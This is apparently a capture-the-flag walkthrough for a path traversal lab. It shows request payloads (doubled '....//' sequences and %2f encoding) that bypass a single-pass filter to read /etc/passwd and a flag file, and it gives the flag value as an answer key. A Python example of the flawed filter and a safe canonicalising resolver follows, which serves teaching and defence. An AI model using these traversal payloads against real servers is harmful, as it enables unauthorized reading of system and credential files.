HACKR.GG
hackr.gg — Official Walkthrough
Confidential · Educational Use Only

DevDocs — File Viewer

Path Traversal · Path Traversal
Difficulty: Intermediate
Vuln class: Path Traversal
Steps: 3
// Objective
Bypass a path traversal filter to read sensitive files outside the document root.
// Tools required
Browser, Burp Suite, curl
// Step-by-step walkthrough
1. Test basic path traversal
The file viewer accepts a path parameter. Try a simple ../ escape to see if the server blocks it.
Command / Input
GET /docs?path=../../etc/passwd
Output
Error: Invalid path — traversal blocked
2. Bypass with encoding or doubled sequences
The filter strips ../ literally. Try URL double-encoding or null byte insertion to bypass.
Command / Input
GET /docs?path=..%2f..%2fetc%2fpasswd
GET /docs?path=....//....//etc/passwd
Output
root:x:0:0:root:/root:/bin/bash...
....// works because the filter strips ../ only once and does not re-check the result: removing the inner ../ from ....// leaves ../ in place.
3. Read the flag
Apply the same bypass to reach /flag.txt.
Command / Input
GET /docs?path=....//....//....//flag.txt
Output
HackrGG{p4th_tr4v3rs4l_f1l3_r34d}
// Flag
Flag value: HackrGG{p4th_tr4v3rs4l_f1l3_r34d}
At /flag.txt — accessible after bypassing the traversal filter with doubled sequences.
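
The root cause and its fix, as an added example that is not part of the original walkthrough or the lab's own code: a Python model of the single-pass ../ strip described in step 2, beside a resolver that canonicalises the path and then checks it is still inside the document root. The names naive_filter, resolve_safely and the temporary DOC_ROOT are assumptions made for illustration, and POSIX paths are assumed.

```python
import os
import tempfile
from typing import Optional
from urllib.parse import unquote


def naive_filter(path: str) -> str:
    # Assumed model of the lab's filter: remove each literal "../" in ONE pass.
    # The output is never re-checked, so "....//" collapses back into "../".
    return path.replace("../", "")


def resolve_safely(doc_root: str, user_path: str) -> Optional[str]:
    """Return the canonical path if it stays inside doc_root, else None."""
    if "\x00" in user_path:  # reject embedded NUL bytes outright
        return None
    root = os.path.realpath(doc_root)
    # join() discards root when user_path is absolute; realpath() collapses
    # ".." segments and symlinks, so the check below sees the real target.
    candidate = os.path.realpath(os.path.join(root, user_path))
    # commonpath() compares whole path components, so a sibling directory
    # such as "docs-private" is not mistaken for being inside "docs".
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


# Constructed document root for the demo (not the lab's real layout).
DOC_ROOT = os.path.join(os.path.realpath(tempfile.mkdtemp()), "docs")
os.makedirs(os.path.join(DOC_ROOT, "guide"))

if __name__ == "__main__":
    # Constructed inputs: one benign path plus the payload shapes from the steps.
    samples = ["guide/intro.md", "../../etc/passwd", "....//....//etc/passwd",
               "..%2f..%2fetc%2fpasswd", "/flag.txt", "../docs-private/notes.md"]
    for raw in samples:
        decoded = unquote(raw)            # decode exactly once, before any check
        stripped = naive_filter(decoded)  # what the weak filter hands onward
        print(f"{raw!r:30} strip -> {stripped!r:22} "
              f"strip escapes root: {resolve_safely(DOC_ROOT, stripped) is None!s:5} "
              f"resolver on input: {resolve_safely(DOC_ROOT, decoded)}")
```

The resolver never rewrites the input; it only decides whether the resolved target is inside the root, which is why doubled or otherwise reshaped sequences give it nothing to slip past.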